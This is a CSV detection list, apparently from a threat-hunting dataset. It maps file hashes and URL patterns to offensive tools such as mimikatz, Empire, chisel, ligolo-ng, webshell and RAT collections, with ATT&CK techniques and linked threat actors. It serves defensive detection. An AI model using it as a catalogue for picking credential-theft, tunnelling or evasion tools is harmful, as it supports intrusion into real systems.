"*128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264*",".{0,1000}128038cf630fced3b39cb074030f57e07cf1e975bc374ff7e281cce382284264.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22063"
"*1286a0815c6982fadf3a1da2565fedfd133b8d07a5de1d592a640c3abbc2ffa5*",".{0,1000}1286a0815c6982fadf3a1da2565fedfd133b8d07a5de1d592a640c3abbc2ffa5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22064"
"*128cbad77f003d2c34c42041a88e628de1abcbc3ba0c2e6aa3e886a2d0bec83c*",".{0,1000}128cbad77f003d2c34c42041a88e628de1abcbc3ba0c2e6aa3e886a2d0bec83c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22066"
"*12949a43a532f0a6ed86b7a877df767050ffa81e3afa47241fbf61cbec5e58f9*",".{0,1000}12949a43a532f0a6ed86b7a877df767050ffa81e3afa47241fbf61cbec5e58f9.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","0","#filehash","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","22068"
"*12962d7fe733b60acfffc35698b22328453c2a04665c90758f53f31fdf81cbf8*",".{0,1000}12962d7fe733b60acfffc35698b22328453c2a04665c90758f53f31fdf81cbf8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22069"
"*12987a2b5075539702057175b5355b545884e49cc5d836f84ec5ce8f2cd47635*",".{0,1000}12987a2b5075539702057175b5355b545884e49cc5d836f84ec5ce8f2cd47635.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22071"
"*12a5454a02b28e9ad2e478356792d8d18c554d25518c95b6c57f6f8e0b1319a6*",".{0,1000}12a5454a02b28e9ad2e478356792d8d18c554d25518c95b6c57f6f8e0b1319a6.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22073"
"*12a7c285045a2963e92a9440777baf1ee1c8d2b15f2df222913f04ba4f27d04b*",".{0,1000}12a7c285045a2963e92a9440777baf1ee1c8d2b15f2df222913f04ba4f27d04b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22074"
"*12aa6879942823c8807fa8fb30e248e1c0504c2588995ff6930c446eb2b999d5*",".{0,1000}12aa6879942823c8807fa8fb30e248e1c0504c2588995ff6930c446eb2b999d5.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","22075"
"*12bb1ec9171a601039a806395bb84d225eb0ac7e1ec975b91061dda5894b2dd7*",".{0,1000}12bb1ec9171a601039a806395bb84d225eb0ac7e1ec975b91061dda5894b2dd7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22076"
"*12bc134420da64f0ff3a93d3a1ca6376677ae9c0494b545173bf20e45787e873*",".{0,1000}12bc134420da64f0ff3a93d3a1ca6376677ae9c0494b545173bf20e45787e873.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","#filehash","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","22077"
"*12c8b5d3a0a5fe18a149da3c33b14b2cd0fb548e4ef491e1d242ae4ad7e7b8e4*",".{0,1000}12c8b5d3a0a5fe18a149da3c33b14b2cd0fb548e4ef491e1d242ae4ad7e7b8e4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22079"
"*12c9cf22a8a7c652c7ea63dbbdf7ffac3052ca6b49828d03261cc258d95afeef*",".{0,1000}12c9cf22a8a7c652c7ea63dbbdf7ffac3052ca6b49828d03261cc258d95afeef.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","22080"
"*12d146f460ca2fca230ba12f1f8ead49340022793ac262b87732a517477c237d*",".{0,1000}12d146f460ca2fca230ba12f1f8ead49340022793ac262b87732a517477c237d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","22081"
"*12d55d1fbe1ca3c7889434234adfda1abfbd5a8aacb076026b4a94e81d696bd5*",".{0,1000}12d55d1fbe1ca3c7889434234adfda1abfbd5a8aacb076026b4a94e81d696bd5.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#filehash","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","22083"
"*12da3e3bfe44e83838a66ed2c8cbaf3fd7153b815d21dd14c2f8de2f10130b3d*",".{0,1000}12da3e3bfe44e83838a66ed2c8cbaf3fd7153b815d21dd14c2f8de2f10130b3d.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22085"
"*12dbd354b4cc073ea7f80cc0d74bd96118362e9c120df7800cf0f9e863569f98*",".{0,1000}12dbd354b4cc073ea7f80cc0d74bd96118362e9c120df7800cf0f9e863569f98.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22086"
"*12de29e0372dc7deeb72828e2d98d1f918a9b1093ca55a579cbec210a31fb325*",".{0,1000}12de29e0372dc7deeb72828e2d98d1f918a9b1093ca55a579cbec210a31fb325.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22087"
"*12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625*",".{0,1000}12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22088"
"*12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625*",".{0,1000}12debc3c0e9c84b1d7d5ddaf3fc907d2fc2c4f0e6d340875eb4bf468250d9625.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22089"
"*12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73*",".{0,1000}12e0ec8e9b714f9f157496dace0e714238403b5e8f3000bbeedf31b0a811bf73.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","22091"
"*12e55226b801ebdfcc9334ca438a57db1da463de48e2893009a7bb3e5e5e0dbc*",".{0,1000}12e55226b801ebdfcc9334ca438a57db1da463de48e2893009a7bb3e5e5e0dbc.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","22092"
"*12e90d90d2c9c31ab613cfec98d6b7b982610ebbe460536ece39593a7eb16596*",".{0,1000}12e90d90d2c9c31ab613cfec98d6b7b982610ebbe460536ece39593a7eb16596.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22093"
"*12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62*",".{0,1000}12e9256bbb969343cc20fa9e259c0af1bf12d6c7bd0263bd7b2a60575b73cf62.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","22094"
"*12eb25ef52882b1d26acfcdd8eedc223874bcc405be27cc669fa655f2564c64e*",".{0,1000}12eb25ef52882b1d26acfcdd8eedc223874bcc405be27cc669fa655f2564c64e.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","22095"
"*12fafdb155bc9caa4e45317fe688bc312179863fbc4e66c5ccc014fad977ebfd*",".{0,1000}12fafdb155bc9caa4e45317fe688bc312179863fbc4e66c5ccc014fad977ebfd.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22096"
"*1302e8b96f9a4f7230cd751f740305bb98231e4b9cb5ebeb68ba0d4fd71231b6*",".{0,1000}1302e8b96f9a4f7230cd751f740305bb98231e4b9cb5ebeb68ba0d4fd71231b6.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22097"
"*130a517af6464f5a3d5e390b5fb90711029720b59cdeaab3c0300b4cf57227f9*",".{0,1000}130a517af6464f5a3d5e390b5fb90711029720b59cdeaab3c0300b4cf57227f9.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","0","#filehash","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","22100"
"*130af28d5a846c7f961a6a0a1188e1688501d8c0c4a3df4c1451005f1fc162fa*",".{0,1000}130af28d5a846c7f961a6a0a1188e1688501d8c0c4a3df4c1451005f1fc162fa.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","22101"
"*13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de*",".{0,1000}13116f7c3441519cd91e74061f0490c15b1b99f32a5209ec52b9cc4ef3fb67de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22103"
"*13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b*",".{0,1000}13118127bd6a7dfaf76cb35833325627d1df6937064f6ec7d3a05f5829902d2b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22104"
"*1312202e1f36db3f8bb319c6a886ba558373b83dd9d8bd54a8fc42ae156d81cb*",".{0,1000}1312202e1f36db3f8bb319c6a886ba558373b83dd9d8bd54a8fc42ae156d81cb.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","22105"
"*1316ca67af20db4bc3b47218855dfd47d9075f0a72bb681821f70af4fdce6f5c*",".{0,1000}1316ca67af20db4bc3b47218855dfd47d9075f0a72bb681821f70af4fdce6f5c.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22107"
"*131bacdddd51f0d5d869b63912606719cd8f7a8f5b5f4237cbdb5c2e22e2cba2*",".{0,1000}131bacdddd51f0d5d869b63912606719cd8f7a8f5b5f4237cbdb5c2e22e2cba2.{0,1000}","offensive_tool_keyword","WMIHACKER","Bypass anti-virus software lateral movement command execution test tool - No need 445 Port","T1047 - T1569.002 - T1218 - T1036.005","TA0008 - TA0002 - TA0005","N/A","N/A","Lateral Movement","https://github.com/rootclay/WMIHACKER","1","0","#filehash","N/A","9","10","1423","236","2025-01-20T15:37:28Z","2020-07-02T06:57:25Z","22108"
"*131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a*",".{0,1000}131c1f2e3e3062392bece1caca144ef426920af8c8a54912f8ec23321a766b5a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22109"
"*1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6*",".{0,1000}1328197e04ea25df954765cb6b7cd7a2a13bae3ffdd71c4e60a8a627508efda6.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22111"
"*132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5*",".{0,1000}132ab5d9aa388ae3a6575a01fadeb7fa7f77aac1150fc54bc1d20ae32b58ddc5.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","0","#filehash","image","5","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","22112"
"*132d0b0131489f45673dc3eb4c226f31c08faebfbbcbdce3b77fc07ea9ca12cd*",".{0,1000}132d0b0131489f45673dc3eb4c226f31c08faebfbbcbdce3b77fc07ea9ca12cd.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22113"
"*1337*/api/agents/*/results?token=*",".{0,1000}1337.{0,1000}\/api\/agents\/.{0,1000}\/results\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22114"
"*1337*/api/creds?token=*",".{0,1000}1337.{0,1000}\/api\/creds\?token\=.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","22115"
